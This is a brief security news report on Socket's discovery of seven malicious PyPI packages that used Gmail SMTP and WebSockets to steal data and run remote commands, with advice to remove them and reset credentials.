Security researchers at Socket uncovered seven harmful Python packages on PyPI that abused Gmail's SMTP servers and WebSockets to enable data theft and remote command execution.
These packages, some of which remained on the platform for over four years, were removed following Socket's report, though one had already been downloaded over 18,000 times.
The attackers used hardcoded Gmail credentials to send system details through email, likely evading detection due to Gmail’s trusted reputation.
After this initial contact, the malware connected to a remote server via encrypted WebSockets to establish a persistent tunnel for system control. This setup allowed attackers to exfiltrate data, run shell commands, move laterally across networks, and even steal admin credentials.
The email addresses involved hint at a cryptocurrency theft motive, consistent with similar historical tactics.
Users who installed any of the malicious packages—such as Coffin-Codes-2022 or Coffin-Grave—are urged to remove them and reset all affected credentials.
A parallel case involving the npm ecosystem revealed a fake TypeScript package targeting high-balance crypto wallets, further highlighting the persistent threat from malicious open-source components.
Read more...